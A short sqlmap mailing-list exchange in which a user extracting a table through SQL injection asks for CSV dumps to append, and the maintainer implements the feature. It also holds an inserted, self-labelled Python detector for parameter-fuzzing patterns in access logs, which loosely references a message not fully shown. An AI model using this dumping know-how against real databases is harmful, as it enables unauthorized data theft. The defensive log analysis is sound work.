With --ignore-404 I do not mean to imply that sqlmap should not evaluate HTTP status codes at all (e.g. when using to differentiate between true and false in boolean based sql injections).

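Seen from the server side, the behaviour described in the message above (one path, many distinct values for one parameter, answers spread over 200/403/400/404) is a recognisable pattern in access logs. The following is an added example, not part of the original post or of sqlmap: the log lines are constructed, and the log format, the function names and the thresholds are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in common log format; not taken from the thread.
SAMPLE_LOG = """\
198.51.100.7 - - [24/Apr/2013:18:40:01 +0000] "GET /foo.bar?param=payload1 HTTP/1.1" 200 512
198.51.100.7 - - [24/Apr/2013:18:40:01 +0000] "GET /foo.bar?param=payload2 HTTP/1.1" 403 128
198.51.100.7 - - [24/Apr/2013:18:40:02 +0000] "GET /foo.bar?param=payload3 HTTP/1.1" 400 128
198.51.100.7 - - [24/Apr/2013:18:40:02 +0000] "GET /foo.bar?param=payload4 HTTP/1.1" 404 128
198.51.100.7 - - [24/Apr/2013:18:40:03 +0000] "GET /foo.bar?param=payload5 HTTP/1.1" 404 128
203.0.113.9 - - [24/Apr/2013:18:40:03 +0000] "GET /foo.bar?param=42 HTTP/1.1" 200 512
203.0.113.9 - - [24/Apr/2013:18:40:09 +0000] "GET /missing.png HTTP/1.1" 404 128
203.0.113.9 - - [24/Apr/2013:18:41:10 +0000] "GET /foo.bar?param=43 HTTP/1.1" 200 512
not a log line
"""

# Assumed format: client ident user [time] "METHOD target PROTO" status size
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def parse(log_text):
    """Yield (client, path, params, status); skip lines that do not match."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, _method, target, status = m.groups()
        url = urlsplit(target)
        yield client, url.path, parse_qsl(url.query, keep_blank_values=True), int(status)

def flag_probing(log_text, min_values=4, min_error_ratio=0.5, min_statuses=3):
    """Return {(client, path, param): stats} for parameter-fuzzing patterns."""
    values = defaultdict(set)      # distinct values seen per (client, path, param)
    statuses = defaultdict(list)   # status of every request carrying that param
    for client, path, params, status in parse(log_text):
        for name, value in params:
            key = (client, path, name)
            values[key].add(value)
            statuses[key].append(status)
    flagged = {}
    for key, seen in values.items():
        codes = statuses[key]
        error_ratio = sum(c >= 400 for c in codes) / len(codes)
        if (len(seen) >= min_values and error_ratio >= min_error_ratio
                and len(set(codes)) >= min_statuses):
            flagged[key] = {"values": len(seen), "error_ratio": error_ratio,
                            "statuses": sorted(set(codes))}
    return flagged

if __name__ == "__main__":
    for key, stats in flag_probing(SAMPLE_LOG).items():
        print(key, stats)
```

The second client in the sample sends two ordinary values and one unrelated 404, so it stays below every threshold and is not reported.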
From: Miroslav S. <mir...@gm...> - 2013-04-24 14:10:48

Hi Stephen.

Thank you and find it implemented with the latest commit [1].

Kind regards,
Miroslav Stampar

[1] https://github.com/sqlmapproject/sqlmap/commit/63d7707346321e198cc8e53b64f01244ee5b7f66

On Wed, Apr 24, 2013 at 1:22 PM, Stephen Shkardoon <ss...@ss...> wrote:

> Thanks!
>
> Always appreciate the work you do. Awesome that you can implement this so
> quickly.
>
> On Wed, Apr 24, 2013 at 11:17 PM, Miroslav Stampar <mir...@gm...> wrote:
>
>> Hi Stephen.
>>
>> Going to patch it today.
>>
>> Kind regards,
>> Miroslav Stampar
>> On 24.4.2013. 13:10 "Stephen Shkardoon" <ss...@ss...> wrote:
>>
>>> I have a particular injection that requires a lot of manual
>>> intervention, and as such, I'm doing dumps with --start=X --stop=X+50 (or
>>> so). However, this replaces the output/foo/table.csv, rather than appending
>>> each dump to it.
>>>
>>> Any chance of a workaround (of course I can manually copy it
>>> as required), or a feature request being opened or anything like that?

--
Miroslav Stampar
http://about.me/stamparm
